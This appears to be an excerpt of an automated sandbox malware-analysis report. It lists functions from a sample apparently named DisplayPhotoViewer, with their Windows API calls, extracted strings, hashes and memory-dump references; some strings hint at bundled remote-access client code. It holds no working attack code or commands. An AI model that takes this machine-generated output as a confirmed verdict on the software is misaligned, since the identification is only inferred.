                                                                                                    • String ID:
                                                                                                    • API String ID: 190572456-0
                                                                                                    • Opcode ID: 233903392df06338b3f2c8a4faf8cf208d1f2162a67ad1df7b6ea8cc37579ce2
                                                                                                    • Instruction ID: d5706c1e78f67052f3109f641fb3da105fae7633845825e59f762560ef698efe
                                                                                                    • Opcode Fuzzy Hash: 233903392df06338b3f2c8a4faf8cf208d1f2162a67ad1df7b6ea8cc37579ce2
                                                                                                    • Instruction Fuzzy Hash: E731BFB6A226389FE742CBE4C4C4A79B7E8E3CC749F00827AE5218364CD7749441CFA0
                                                                                                    Function 1110B500 Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetStockObject.GDI32(00000007), ref: 1110B517
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1110B526
                                                                                                    • SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,11112194,?,00000001,00000001,00000000,111169A7,00000000,?,00000000), ref: 1110B531
                                                                                                    • GetStockObject.GDI32(00000000), ref: 1110B539
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 1110B542
                                                                                                    • GetStockObject.GDI32(0000000D), ref: 1110B546
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1110B54F
                                                                                                    • SelectClipRgn.GDI32(00000000,00000000), ref: 1110B563
                                                                                                    • SelectClipRgn.GDI32(?,?), ref: 1110B585
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Object$Select$Stock$Clip$Brush
                                                                                                    • String ID:
                                                                                                    • API String ID: 2690518013-0
                                                                                                    • Opcode ID: 0e28264b6466a9b73ce7f8e67dfb6895454015b4cd75f8d18bc32c6caf2bcd23
                                                                                                    • Instruction ID: dcc9ad77b0e3d9334746c1aa21f63614a8ac350f048a1af3a655f16de992b504
                                                                                                    • Opcode Fuzzy Hash: 0e28264b6466a9b73ce7f8e67dfb6895454015b4cd75f8d18bc32c6caf2bcd23
                                                                                                    • Instruction Fuzzy Hash: A5113A71600604AFE720EFA9CC84F2AF7E8BF48714F254829E59897280C774E840CFA4
                                                                                                    Function 1113D020 Relevance: 13.6, APIs: 9, Instructions: 56threadsynchronizationCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 1113D056
                                                                                                    • GetCurrentThread.KERNEL32 ref: 1113D059
                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 1113D060
                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 1113D063
                                                                                                    • CreateThread.KERNEL32(00000000,00001000,1113CFD0,?,00000000,?), ref: 1113D083
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1113D08E
                                                                                                    • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 1113D099
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1113D0A6
                                                                                                    • CloseHandle.KERNEL32(?), ref: 1113D0AC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CurrentHandleThread$CloseProcess$CodeCreateDuplicateExitObjectSingleWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 4048439911-0
                                                                                                    • Opcode ID: eea4247776c04defb3709bf7d350b193a04939d91f5354f80ce9231d2e2a0acf
                                                                                                    • Instruction ID: 8789abf273926b7e99cca029b3e208802ecef246308cfdcc9559dfce037f3cc0
                                                                                                    • Opcode Fuzzy Hash: eea4247776c04defb3709bf7d350b193a04939d91f5354f80ce9231d2e2a0acf
                                                                                                    • Instruction Fuzzy Hash: B0110D71D10228ABDB10DFA8DC49BEEBBBCEB08754F008159F914A7288D6B45A018BA1
                                                                                                    Function 11045770 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 327windowtimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsWindow.USER32(?), ref: 11045821
                                                                                                    • _malloc.LIBCMT ref: 110458BD
                                                                                                    • _memmove.LIBCMT ref: 11045922
                                                                                                    • SendMessageTimeoutA.USER32(?,0000004A,0006029E,00000005,00000002,00002710,?), ref: 11045982
                                                                                                    • _free.LIBCMT ref: 11045989
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                      • Part of subcall function 110422F0: _free.LIBCMT ref: 11042377
                                                                                                      • Part of subcall function 110422F0: _free.LIBCMT ref: 11042397
                                                                                                      • Part of subcall function 110422F0: _strncpy.LIBCMT ref: 110423C5
                                                                                                      • Part of subcall function 110422F0: _strncpy.LIBCMT ref: 11042402
                                                                                                      • Part of subcall function 110422F0: _malloc.LIBCMT ref: 1104243C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
                                                                                                    • String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h
                                                                                                    • API String ID: 3960737985-2967710367
                                                                                                    • Opcode ID: bcd3daf033d967f1d9cca255c6b83aa001d663cae78bb101683a05f94304e5d5
                                                                                                    • Instruction ID: 5919227509b6c1cd0f5a8cfa33dc3f062349fd2b33b5d0098d04dad6020396e0
                                                                                                    • Opcode Fuzzy Hash: bcd3daf033d967f1d9cca255c6b83aa001d663cae78bb101683a05f94304e5d5
                                                                                                    • Instruction Fuzzy Hash: 29C19374E0060A9FDB04DFA4C8D0EEEF7B5BF89304F208168D51A9B694EB71A945CB91
                                                                                                    Function 1103B7D0 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 319COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _malloc.LIBCMT ref: 1103B863
                                                                                                    • _memset.LIBCMT ref: 1103B871
                                                                                                    • _memmove.LIBCMT ref: 1103B87E
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                      • Part of subcall function 1103B550: Sleep.KERNEL32(000001F4,00000000,?,00000000,-111E103C), ref: 1103B581
                                                                                                      • Part of subcall function 11027F50: _strrchr.LIBCMT ref: 11028045
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028084
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExitProcess$ErrorLastMessageSleep_malloc_memmove_memset_strrchrwsprintf
                                                                                                    • String ID: IsA()$PF%sinclude:*exclude:$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$redirect:
                                                                                                    • API String ID: 3725223747-631189234
                                                                                                    • Opcode ID: 19d8a4e5d375a7eb185e244eb380631696b46d248f4f5312f5c3c1ef66cc61ff
                                                                                                    • Instruction ID: 4f1d40467b6062d492038a749f24983a4c634af8c509c60cb4a0960e8162d997
                                                                                                    • Opcode Fuzzy Hash: 19d8a4e5d375a7eb185e244eb380631696b46d248f4f5312f5c3c1ef66cc61ff
                                                                                                    • Instruction Fuzzy Hash: B4B1C339E00A579FDB05DF94CCA0FEEF7B1BF85219F408154E925A7385EA30A9058B91
                                                                                                    Function 1114D010 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 152COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _malloc.LIBCMT ref: 1114D056
                                                                                                      • Part of subcall function 111583B1: __FF_MSGBANNER.LIBCMT ref: 111583CA
                                                                                                      • Part of subcall function 111583B1: __NMSG_WRITE.LIBCMT ref: 111583D1
                                                                                                      • Part of subcall function 111583B1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 111583F6
                                                                                                    • _memset.LIBCMT ref: 1114D06F
                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 1114D0CF
                                                                                                    • _malloc.LIBCMT ref: 1114D0F7
                                                                                                    • _free.LIBCMT ref: 1114D1D3
                                                                                                    • _free.LIBCMT ref: 1114D1DF
                                                                                                      • Part of subcall function 110E6E70: _memmove.LIBCMT ref: 110E6F8F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free_malloc$AllocateBitsHeap_memmove_memset
                                                                                                    • String ID: (
                                                                                                    • API String ID: 3140430649-3887548279
                                                                                                    • Opcode ID: 6e4e08085dd2f3194cdba96a60389649f18772a3e6ef9c066b46f128c6eb636b
                                                                                                    • Instruction ID: 9b10451811fea9ba676d3732e3f1d1642c315e07d3ea4e89a1ea02e94ee7f4fa
                                                                                                    • Opcode Fuzzy Hash: 6e4e08085dd2f3194cdba96a60389649f18772a3e6ef9c066b46f128c6eb636b
                                                                                                    • Instruction Fuzzy Hash: 6D5171B5A012149FDB50DF18CC80B9EB7B5EF88708F9541A9EA08DB341DB30EA40CF69
                                                                                                    Function 11085180 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 115timewindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetTimer.USER32(00000000,00000000,?,Function_000B2600), ref: 11085266
                                                                                                    • MessageBoxIndirectA.USER32(00000028), ref: 11085272
                                                                                                    • KillTimer.USER32(00000000,00000000), ref: 1108527D
                                                                                                    • PeekMessageA.USER32(?,00000000,00000012,00000012,00000001), ref: 1108528F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessageTimer$IndirectKillPeek
                                                                                                    • String ID: ($EH NOFAIL msg=%s
                                                                                                    • API String ID: 191993809-813564207
                                                                                                    • Opcode ID: de97985ff81b10a1741cdde529b311bb6ef5a03e632dcd8e32c65a56bd58dd45
                                                                                                    • Instruction ID: 8cb5c284af9faec743a345b9402f5b48b7a0b965cf4017f68c7df73f46ef3b36
                                                                                                    • Opcode Fuzzy Hash: de97985ff81b10a1741cdde529b311bb6ef5a03e632dcd8e32c65a56bd58dd45
                                                                                                    • Instruction Fuzzy Hash: CD416071E142099FDB50DFA9E885BDEBBF4EF88315F10406AF918E7244EB719941CBA0
                                                                                                    Function 110C77A0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 110C781B
                                                                                                    • GetWindowRect.USER32(?,?), ref: 110C7829
                                                                                                    • MapWindowPoints.USER32(00000000,?,00000018,00000002), ref: 110C7864
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$ErrorExitLastMessagePointsProcesswsprintf
                                                                                                    • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$hWnd$m_hWnd
                                                                                                    • API String ID: 976951863-995508580
                                                                                                    • Opcode ID: 928e3a65d07facfeacd891c660517119ae17fa036a0a6f4f1a30a60ae5241aad
                                                                                                    • Instruction ID: 59a47bbbc285fc246557415b63f305e486d2a63fbf9a7c98b17aba2b85de9725
                                                                                                    • Opcode Fuzzy Hash: 928e3a65d07facfeacd891c660517119ae17fa036a0a6f4f1a30a60ae5241aad
                                                                                                    • Instruction Fuzzy Hash: 8F413B75E0060AAFCB04CF69D884EAAFBB4BF88704B00C599E9199B755D730E915CFA1
                                                                                                    Function 111234D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11122C00: LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 11122C36
                                                                                                      • Part of subcall function 11122C00: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 11122C53
                                                                                                      • Part of subcall function 11122C00: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 11122C5D
                                                                                                      • Part of subcall function 11122C00: GetProcAddress.KERNEL32(00000000,socket), ref: 11122C6B
                                                                                                      • Part of subcall function 11122C00: GetProcAddress.KERNEL32(00000000,closesocket), ref: 11122C79
                                                                                                      • Part of subcall function 11122C00: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 11122C87
                                                                                                      • Part of subcall function 11122C00: FreeLibrary.KERNEL32(00000000), ref: 11122CFC
                                                                                                    • LoadLibraryA.KERNEL32(ws2_32.dll,?,?,00000000), ref: 1112351A
                                                                                                    • GetProcAddress.KERNEL32(00000000,ntohl), ref: 11123532
                                                                                                    • _calloc.LIBCMT ref: 1112353D
                                                                                                    • _free.LIBCMT ref: 111235DB
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 111235F2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad$_calloc_free
                                                                                                    • String ID: ntohl$ws2_32.dll
                                                                                                    • API String ID: 2881363997-4165132517
                                                                                                    • Opcode ID: 9cf601c31173e881da82343d764f31f41489007e2fb6e39136d3408191708be2
                                                                                                    • Instruction ID: dd055e59ea46509df880882031a7980c0bf75708d40e00152f2d6e66d058c424
                                                                                                    • Opcode Fuzzy Hash: 9cf601c31173e881da82343d764f31f41489007e2fb6e39136d3408191708be2
                                                                                                    • Instruction Fuzzy Hash: F1316075E142299BC791DF548D80799F7F8FF48714F6181A9E888A7304DF30AA858FD1
                                                                                                    Function 1100F2D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F2FD
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F320
                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 1100F3A4
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1100F3B2
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F3C5
                                                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F3DF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                    • String ID: bad cast
                                                                                                    • API String ID: 2427920155-3145022300
                                                                                                    • Opcode ID: 8bf9cb6a006ec96d7f0899834dca8d91d7ec2d1a6e0afd45d62e70498fc3bf3d
                                                                                                    • Instruction ID: 0dc3eda6241a0dbddb48c452862a868cd14ce2ef7e660d9faf1b2705b6f5d502
                                                                                                    • Opcode Fuzzy Hash: 8bf9cb6a006ec96d7f0899834dca8d91d7ec2d1a6e0afd45d62e70498fc3bf3d
                                                                                                    • Instruction Fuzzy Hash: EC31B175D042269BDB55DF94C880BAEF7B4EB05378F10826DD832A7680DB30BE40CB92
                                                                                                    Function 10709AA3 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 10709B10
                                                                                                    • GetStdHandle.KERNEL32(000000F4,10710518,00000000,?,00000000,?), ref: 10709BE6
                                                                                                    • WriteFile.KERNEL32(00000000), ref: 10709BED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
